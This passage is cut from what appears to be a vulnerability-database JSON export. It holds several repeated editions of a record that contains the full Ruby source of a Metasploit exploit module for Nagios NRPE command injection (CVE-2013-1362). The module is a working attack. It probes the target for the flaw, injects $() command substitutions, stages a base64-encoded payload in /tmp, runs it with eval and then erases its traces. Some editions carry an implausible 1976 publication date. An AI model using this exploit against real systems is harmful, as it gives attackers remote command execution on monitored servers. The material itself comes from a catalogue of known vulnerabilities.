another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-23T13:51:05", "differentElements": ["modified", "published"], "edition": 57}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-28T09:55:40", "history": [], "viewCount": 85, "enchantments": {"score": {"value": 3.3, "modified": "2018-03-28T09:55:40", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-28T09:55:40", "differentElements": ["modified", "published"], "edition": 58}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-28T21:54:37", "history": [], "viewCount": 87, "enchantments": {"score": {"value": 3.3, "modified": "2018-03-28T21:54:37", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-28T21:54:37", "differentElements": ["modified", "published"], "edition": 59}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-29T23:57:07", "history": [], "viewCount": 87, "enchantments": {"score": {"value": 3.3, "modified": "2018-03-29T23:57:07", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-29T23:57:07", "differentElements": ["modified", "published"], "edition": 60}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-30T03:56:25", "history": [], "viewCount": 92, "enchantments": {"score": {"value": 3.3, "modified": "2018-03-30T03:56:25", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-30T03:56:25", "differentElements": ["modified", "published"], "edition": 61}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-04-06T14:12:56", "history": [], "viewCount": 93, "enchantments": {"score": {"value": 3.3, "modified": "2018-04-06T14:12:56", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to 